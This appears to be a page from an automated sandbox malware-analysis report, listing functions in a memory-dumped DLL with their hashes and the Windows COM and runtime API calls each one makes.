Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID:
API String ID: 959723449-0
Opcode ID: 30bb8a31218708ca4387caa872fe71afebc5519f3db4859511b2be2f2c3cb472
Instruction ID: 7f955e5f73a0ffba0fe70a575db92c86d3115a55859a9c702d5a5223cc422023
Opcode Fuzzy Hash: 30bb8a31218708ca4387caa872fe71afebc5519f3db4859511b2be2f2c3cb472
Instruction Fuzzy Hash: B5C15B70A00205AFDB14DF6CCC80FADB7B9AF85304F5089D9E919AF286DB75E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F894170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F8941AF
VariantInit.OLEAUT32(?), ref: 6F8941B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F8941C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F8941F5
VariantClear.OLEAUT32(?), ref: 6F894201
std::tr1::_Xweak.LIBCPMT ref: 6F894450
SafeArrayDestroy.OLEAUT32(?), ref: 6F89446D
VariantClear.OLEAUT32(?), ref: 6F89447D
VariantClear.OLEAUT32(?), ref: 6F894483

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 9fa9d40daf68e4cbc73f1d682489dfb3de94e54aaa7cd01f1cda12ee82ad3184
Instruction ID: 6595fcd8aa32afb7bbf59e7d1dc931d26045d6dc55d02a8653b18b972838495c
Opcode Fuzzy Hash: 9fa9d40daf68e4cbc73f1d682489dfb3de94e54aaa7cd01f1cda12ee82ad3184
Instruction Fuzzy Hash: 03B15A75A01609AFCB14DF98C884DEAB3F5BF8D310F1585ADE50AAB794DA34F841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F89C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F89C88F
VariantInit.OLEAUT32(?), ref: 6F89C895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F89C8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F89C8D5
VariantClear.OLEAUT32(?), ref: 6F89C8E1
std::tr1::_Xweak.LIBCPMT ref: 6F89CB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6F89CB39
VariantClear.OLEAUT32(?), ref: 6F89CB49
VariantClear.OLEAUT32(?), ref: 6F89CB4F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: c987a6985272530b57608b18099157f1dba1b5bae78734ab461c084ffd9ec097
Instruction ID: 7cff880180f7b60916be82148eb7eec0ac8a3a5757f18bf2a0423bfbb180cf53
Opcode Fuzzy Hash: c987a6985272530b57608b18099157f1dba1b5bae78734ab461c084ffd9ec097
Instruction Fuzzy Hash: 5AB14975A0060AAFCB14DF98C884DEAB7F5BF8D310F1485ADE506AB791DA34F841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F89C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F89C56F
VariantInit.OLEAUT32(?), ref: 6F89C575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F89C580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F89C5B5
VariantClear.OLEAUT32(?), ref: 6F89C5C1
std::tr1::_Xweak.LIBCPMT ref: 6F89C7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6F89C7F1
VariantClear.OLEAUT32(?), ref: 6F89C801
VariantClear.OLEAUT32(?), ref: 6F89C807

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: fd2d632fa82309d24286d148e6900e72b692b504b83f74b84d87c5fadf518bcc
Instruction ID: a6ac9306a0427dd468997f62214cf88ee0af5edd3d52910e2fa9a7e3493d83c0
Opcode Fuzzy Hash: fd2d632fa82309d24286d148e6900e72b692b504b83f74b84d87c5fadf518bcc
Instruction Fuzzy Hash: 98A14C75A0060AAFCB14DF98C884DEAB7F5BF8D310F1485ADE506AB791D634F941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F896880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F8968B2
VariantInit.OLEAUT32(?), ref: 6F8968BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6F8968D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F8968FD
VariantClear.OLEAUT32(?), ref: 6F896909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F896923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F896981
VariantClear.OLEAUT32(?), ref: 6F89699E
VariantClear.OLEAUT32(?), ref: 6F8969A4

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: e7388c68381cfad4e7991ad7efe0146f41f1a4e1144d31c7fc2d7141ee2099fe
Instruction ID: 39bfddc24ad86a217ec5047d86ff65668f8d5a585dd6c7d1f4b6dc54f22d7f65
Opcode Fuzzy Hash: e7388c68381cfad4e7991ad7efe0146f41f1a4e1144d31c7fc2d7141ee2099fe
Instruction Fuzzy Hash: B14174B1D00209AFDB00CFA8C844EEEBBB8FF99360F14455AE505AB240E775A941CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F88C020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F88C074
VariantInit.OLEAUT32(?), ref: 6F88C07B
VariantInit.OLEAUT32(?), ref: 6F88C082
VariantInit.OLEAUT32(?), ref: 6F88C089
VariantClear.OLEAUT32(?), ref: 6F88C312
VariantClear.OLEAUT32(?), ref: 6F88C319
VariantClear.OLEAUT32(?), ref: 6F88C320
VariantClear.OLEAUT32(?), ref: 6F88C327

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 31f5549f2914f900a8f459f45e07be50deb4ceade42cb2878b2e12fcedd3c23d
Instruction ID: 544cf0a9f9bdd9984f18fe78fe8b7ae103488478dab8fb5f1c335395c0480e87
Opcode Fuzzy Hash: 31f5549f2914f900a8f459f45e07be50deb4ceade42cb2878b2e12fcedd3c23d
Instruction Fuzzy Hash: E7C148756087009FC304DF68C880D5ABBE5BFCA704F248A8DE5A49B369D735E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F896B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6F896C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6F896CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6F896CC7

Part of subcall function 6F895760: std::tr1::_Xweak.LIBCPMT ref: 6F895769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F896CF9

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6F896F13
InterlockedCompareExchange.KERNEL32(6F91C6A4,45524548,4B4F4F4C), ref: 6F896F34

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: e085fdea5040f5ae23c0e1a572b621cdd1034df3044fba48536810f6da329c6d
Instruction ID: ee6d8838cd307fcfc2e6cedab458d0e435824782cb4af774f5f987701606670c
Opcode Fuzzy Hash: e085fdea5040f5ae23c0e1a572b621cdd1034df3044fba48536810f6da329c6d
Instruction Fuzzy Hash: 76D1A2B1A00309AFDB10CFACC890BAE77B8EF46314F1549E9E515AF290D775E940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8816B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::tr1::_Xweak.LIBCPMT ref: 6F881B53
std::_Xinvalid_argument.LIBCPMT ref: 6F881B5D
std::exception::exception.LIBCMT ref: 6F881C43
__CxxThrowException@8.LIBCMT ref: 6F881C58

Strings

invalid vector<T> subscript, xrefs: 6F881B58

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: invalid vector<T> subscript
API String ID: 3098024973-3016609489
Opcode ID: 7348dfbe1180b8018c5ac79441fa3af2778b4f3113eacb4f3c2f3a4338cb42a0
Instruction ID: 90deee8f4b5d12abdabbb493de4156030da46a4148c4fc854886a6a949125daa
Opcode Fuzzy Hash: 7348dfbe1180b8018c5ac79441fa3af2778b4f3113eacb4f3c2f3a4338cb42a0
Instruction Fuzzy Hash: C5223175D007099FCB14CFA8C4809DEFBF5BF44314F118A9DD46AAB694E774AA88CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F8987EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6F8969C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F896A08
Part of subcall function 6F8969C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F896A15
Part of subcall function 6F8969C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F896A41

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 8961e016e32e494a91d9fbf84b8d69cd273f6b1c9740b0d6537d3fc6cdc92f37
Instruction ID: 793fc2b592ce0a6be71614d76073bcfa5c3909170a8ce6a644cc0b0e0200398c
Opcode Fuzzy Hash: 8961e016e32e494a91d9fbf84b8d69cd273f6b1c9740b0d6537d3fc6cdc92f37
Instruction Fuzzy Hash: 0C312C71E00618AFCB14DB6CCC80B9EB7BAAF85300F604ACAE419EB245C775E980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F893C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,8E16AAE4), ref: 6F893C49
VariantInit.OLEAUT32(?), ref: 6F893C81
VariantClear.OLEAUT32(?), ref: 6F893D26
VariantClear.OLEAUT32(?), ref: 6F893D30
VariantClear.OLEAUT32(?), ref: 6F893D89

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID:
API String ID: 4110538090-0
Opcode ID: f1a8a184e697ccd6f7fbb70eb9702edd07402e6ba1f74e34d4f4e0f11ec43751
Instruction ID: 0ff5c59dc96a55383101a1eae103cdcf060342625c59f771f94316a14fcf652e
Opcode Fuzzy Hash: f1a8a184e697ccd6f7fbb70eb9702edd07402e6ba1f74e34d4f4e0f11ec43751
Instruction Fuzzy Hash: 9F616F72A00649AFCB04DFA8C9819DEB7B9FF49314F2489AEE515EB350C731AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F88DB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6F8931EC), ref: 6F88DB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F88DB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6F88DB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F88DBF1
VariantClear.OLEAUT32(?), ref: 6F88DBFB

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID:
API String ID: 182531043-0
Opcode ID: dd07cab62f7ec1919dc22ab007c769603cfcd3615df5fa356e1b81c9b679b42b
Instruction ID: de6656055f1939a4b357e96dd29f386b5f540635fef59c705d4c028b054b9104
Opcode Fuzzy Hash: dd07cab62f7ec1919dc22ab007c769603cfcd3615df5fa356e1b81c9b679b42b
Instruction Fuzzy Hash: AD319176A01605AFD700DF54C944EEEBBF9FF9A760F10859AE911AB340D734A801CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DA42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__CRT_INIT@12.LIBCMT ref: 6F8DA463
__CRT_INIT@12.LIBCMT ref: 6F8DA493
__CRT_INIT@12.LIBCMT ref: 6F8DA4B3

Strings

a0, xrefs: 6F8DA4FF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: T@12
String ID: a0
API String ID: 456891419-3188653782
Opcode ID: 2bfcb396a1e800681947f1e1ad07d7abc8746cdfad4cfcfed471ca542205f286
Instruction ID: c3a1d58c44074487c313fb1a77daf241391844698e19a08835b14daf17f7fede
Opcode Fuzzy Hash: 2bfcb396a1e800681947f1e1ad07d7abc8746cdfad4cfcfed471ca542205f286
Instruction Fuzzy Hash: EB117570D0131669DB249A7B4C4CFAF7ABDAF817A4F209C95B421EE182D738E500CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F89C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F89C478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F89C488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6F89C4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6F89C512

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: e6ac574317c8e50ac9e404ecb11288d0b0af81f65d1cc8122f9d2caf8071110d
Instruction ID: c0c27445efaf946624b0d3717b9b1f384071212f7026b2730405d121aab8ac14
Opcode Fuzzy Hash: e6ac574317c8e50ac9e404ecb11288d0b0af81f65d1cc8122f9d2caf8071110d
Instruction Fuzzy Hash: DE413671A0014AEFDB04DF98C980DEEB7B8FB4A354F10899AF919DB241D731AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F875A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F875ACB
__CxxThrowException@8.LIBCMT ref: 6F875AE0
std::exception::exception.LIBCMT ref: 6F875B18
__CxxThrowException@8.LIBCMT ref: 6F875B2D

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
